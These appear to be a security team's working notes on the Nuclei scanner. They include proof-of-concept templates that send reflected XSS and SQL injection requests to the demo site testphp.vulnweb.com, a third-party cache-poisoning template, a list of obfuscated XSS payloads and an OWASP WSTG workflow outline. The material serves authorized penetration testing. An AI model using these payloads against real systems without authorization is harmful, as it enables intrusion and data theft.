Nuclei summarized: Same concept as nessus, but free and community-driven with templates. More than 2000 templates so far and still growing Scanning can be customized by creating profiles and workflows What did we do: Looking at other templates to understand the concept, made some simple PoC's for XSS and SQLI Future plans: Write new templates to automatize as much as possible for pentest assignments Workflows allow you to use multiple templates (so multiple vulnerabilities) to check them in a sequential way. Workflows can be customized in a stronger way : create conditional template execution based on found versions of technologies, for example # Nuclei Templates - Look for low-hanging fruits - header misconfiguration - https://github.com/projectdiscovery/nuclei-templates/pull/2481/files/0ef631dce102db77f5d848cc97eb3da0cbc77e7b#diff-deb2a989e89059f886e99133da30d32a767e72cc0622237487139c4e1a597bf1 - cookie protection What are we thinking of here? Nuclei doesn't authenticate afaik, so how would we check the session cookies for flags in nuclei? I think burp is better suited for this part - server fingerprinting Nuclei has modules for detecting apache, nginx etc already. So I guess this part is not neccesary unless there are further thoughts to this? - accepted HTTP methods I haven't found any templates for testing trace/options etc, so maybe some modules for this? Burp does this already though - session cookie strength / randomization - interesting files - Look for XSS Injections - Reflected - Stored - DOM-based - Universal # PoC Showcase Templates ## XSS ```yaml= id: acunetix-testphp-rxss info: name: Reflected XSS author: ocd severity: high requests: - raw: - | POST /search.php?test=query HTTP/1.1 Host: testphp.vulnweb.com Content-Length: 75 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://testphp.vulnweb.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://testphp.vulnweb.com/ Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close searchFor=%3Cscript%3Ealert%28%22sensecon21%22%29%3C%2Fscript%3E&goButton=go matchers: - type: word words: - "sensecon21" ```  ## SQL Injection ```yaml= id: acunetix-testphp-sqli info: name: SQL Injection author: ocd severity: high requests: - raw: - | POST /userinfo.php HTTP/1.1 Host: testphp.vulnweb.com Content-Length: 27 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://testphp.vulnweb.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://testphp.vulnweb.com/login.php Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close uname=test%27+OR+%271&pass= matchers: - type: word words: - "John Smith" ```  # External templates by others - DOM XSS https://github.com/geeknik/the-nuclei-templates/blob/main/dom-xss.yaml - Cache poisoning: ```yaml= id: cache-poisoning info: name: Cache Poisoning author: melbadry9 & xelkomy severity: low requests: - raw: - | GET /?mel=9 HTTP/1.1 X-Forwarded-Prefix: cache.melbadry9.com X-Forwarded-Host: cache.melbadry9.com X-Forwarded-For: cache.melbadry9.com - | GET /?mel=9 HTTP/1.1 req-condition: true matchers: - type: dsl dsl: - 'contains(body_2, "cache.melbadry9.com") == true' ``` # Payloads/data for modules: - XSS: ``` \\\\%22-alert(1)}// \'-alert(1)// onload=alert(1) x=" \”}})})-confirm`1`/*/ [].pop.constructor`alert\x281\x29``` \”}})})-confirm`1`(a=>{({b:{/*/// `/alert?.(1)'"><Svg/OnLoad='` alert?.(document?.domain)[document?.domain]?.map?.(alert) top?.[/ale/?.source+/rt/?.source]?.(document?.[/dom/?.source+/ain/?.source]) <Svg/Onload=top%5B"al"%2B"ert%5D(1)// %27onfocus="1>1<alert(1)//contenteditable/autofocus=%27 <k>Javas<k></k>cript:al<k></k>ert(1)</k> <Svg id=innerText OnLoad=location=all[11][id]> ``` https://portswigger.net/web-security/cross-site-scripting/cheat-sheet # Workflows ```yaml= # ____ _ _____ _____ ____ _ ___________________ # / __ \ | / / | / ___// __ \ | | / / ___/_ __/ ____/ # / / / / | /| / / /| | \__ \/ /_/ / | | /| / /\__ \ / / / / __ # / /_/ /| |/ |/ / ___ |___/ / ____/ | |/ |/ /___/ // / / /_/ / # \____/ |__/|__/_/ |_/____/_/ |__/|__//____//_/ \____/ # id: owasp-wstg-workflow info: name: OWASP WSTG Workflow author: Sensepost workflows: ######################### # Information Gathering # ######################### # WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage # Currently manual testing/verification # WSTG-INFO-02 Fingerprint Web Server - template: technologies/ # WSTG-INFO-03 Review Webserver Metafiles for Information Leakage # WSTG-INFO-04 Enumerate Applications on Webserver # WSTG-INFO-05 Review Webpage Content for Information Leakage # WSTG-INFO-06 Identify application entry points # WSTG-INFO-07 Map execution paths through application # WSTG-INFO-08 Fingerprint Web Application Framework # WSTG-INFO-09 Fingerprint Web Application # WSTG-INFO-10 Map Application Architecture ############################################### # Configuration and Deploy Management Testing # ############################################### # WSTG-CONF-01 Test Network Infrastructure Configuration # WSTG-CONF-02 Test Application Platform Configuration # WSTG-CONF-03 Test File Extensions Handling for Sensitive Information # WSTG-CONF-04 Review Old Backup and Unreferenced Files for Sensitive Information # WSTG-CONF-05 Enumerate Infrastructure and Application Admin Interfaces # WSTG-CONF-06 Test HTTP Methods # WSTG-CONF-07 Test HTTP Strict Transport Security # WSTG-CONF-08 Test RIA cross domain policy # WSTG-CONF-09 Test File Permission # WSTG-CONF-10 Test for Subdomain Takeover # WSTG-CONF-11 Test Cloud Storage ############################### # Identity Management Testing # ############################### # WSTG-IDNT-01 Test Role Definitions # WSTG-IDNT-02 Test User Registration Process # WSTG-IDNT-03 Test Account Provisioning Process # WSTG-IDNT-04 Testing for Account Enumeration and Guessable User Account # WSTG-IDNT-05 Testing for Weak or unenforced username policy ########################## # Authentication Testing # ########################## # WSTG-ATHN-01 Testing for Credentials Transported over an Encrypted Channel # WSTG-ATHN-02 Testing for Default Credentials # WSTG-ATHN-03 Testing for Weak Lock Out Mechanism # WSTG-ATHN-04 Testing for Bypassing Authentication Schema # WSTG-ATHN-05 Testing for Vulnerable Remember Password # WSTG-ATHN-06 Testing for Browser Cache Weaknesses # WSTG-ATHN-07 Testing for Weak Password Policy # WSTG-ATHN-08 Testing for Weak Security Question Answer # WSTG-ATHN-09 Testing for Weak Password Change or Reset Functionalities # WSTG-ATHN-10 Testing for Weaker Authentication in Alternative Channel ######################### # Authorization Testing # ######################### # WSTG-ATHZ-01 Testing Directory Traversal File Include # WSTG-ATHZ-02 Testing for Bypassing Authorization Schema # WSTG-ATHZ-03 Testing for Privilege Escalation # WSTG-ATHZ-04 Testing for Insecure Direct Object References ############################## # Session Management Testing # ############################## # WSTG-SESS-01 Testing for Session Management Schema # WSTG-SESS-02 Testing for Cookies Attributes # WSTG-SESS-03 Testing for Session Fixation # WSTG-SESS-04 Testing for Exposed Session Variables # WSTG-SESS-05 Testing for Cross Site Request Forgery # WSTG-SESS-06 Testing for Logout Functionality # WSTG-SESS-07 Testing Session Timeout # WSTG-SESS-08 Testing for Session Puzzling # WSTG-SESS-09 Testing for Session Hijacking ########################### # Data Validation Testing # ########################### # WSTG-INPV-01 Testing for Reflected Cross Site Scripting # WSTG-INPV-02 Testing for Stored Cross Site Scripting # WSTG-INPV-03 Testing for HTTP Verb Tampering # WSTG-INPV-04 Testing for HTTP Parameter Pollution # WSTG-INPV-05 Testing for SQL Injection - template: sqli.yaml !*CHANGE_PATH_FOR_POC* # WSTG-INPV-06 Testing for LDAP Injection # WSTG-INPV-07 Testing for XML Injection # WSTG-INPV-08 Testing for SSI Injection # WSTG-INPV-09 Testing for XPath Injection # WSTG-INPV-10 Testing for IMAP SMTP Injection # WSTG-INPV-11 Testing for Code Injection # WSTG-INPV-12 Testing for Command Injection # WSTG-INPV-13 Testing for Format String Injection # WSTG-INPV-14 Testing for Incubated Vulnerability # WSTG-INPV-15 Testing for HTTP Splitting Smuggling # WSTG-INPV-16 Testing for HTTP Incoming Requests # WSTG-INPV-17 Testing for Host Header Injection # WSTG-INPV-18 Testing for Server-side Template Injection # WSTG-INPV-19 Testing for Server-Side Request Forgery ################## # Error Handling # ################## # WSTG-ERRH-01 Testing for Improper Error Handling # WSTG-ERRH-02 Testing for Stack Traces ################ # Cryptography # ################ # WSTG-CRYP-01 Testing for Weak Transport Layer Security # WSTG-CRYP-02 Testing for Padding Oracle # WSTG-CRYP-03 Testing for Sensitive Information Sent via Unencrypted Channels # WSTG-CRYP-04 Testing for Weak Encryption ################## # Business logic # ################## # WSTG-BUSL-01 Test Business Logic Data Validation # WSTG-BUSL-02 Test Ability to Forge Requests # WSTG-BUSL-03 Test Integrity Checks # WSTG-BUSL-04 Test for Process Timing # WSTG-BUSL-05 Test Number of Times a Function Can be Used Limits # WSTG-BUSL-06 Testing for the Circumvention of Work Flows # WSTG-BUSL-07 Test Defenses Against Application Mis-use # WSTG-BUSL-08 Test Upload of Unexpected File Types # WSTG-BUSL-09 Test Upload of Malicious Files ####################### # Client Side Testing # ####################### # WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting # WSTG-CLNT-02 Testing for JavaScript Execution - template: reflected-xss.yaml !*CHANGE_PATH_FOR_POC* # WSTG-CLNT-03 Testing for HTML Injection # WSTG-CLNT-04 Testing for Client Side URL Redirect # WSTG-CLNT-05 Testing for CSS Injection # WSTG-CLNT-06 Testing for Client Side Resource Manipulation # WSTG-CLNT-07 Test Cross Origin Resource Sharing # WSTG-CLNT-08 Testing for Cross Site Flashing # WSTG-CLNT-09 Testing for Clickjacking # WSTG-CLNT-10 Testing WebSockets # WSTG-CLNT-11 Test Web Messaging # WSTG-CLNT-12 Testing Browser Storage # WSTG-CLNT-13 Testing for Cross Site Script Inclusion ############### # API Testing # ############### # WSTG-APIT-01 Testing GraphQL ```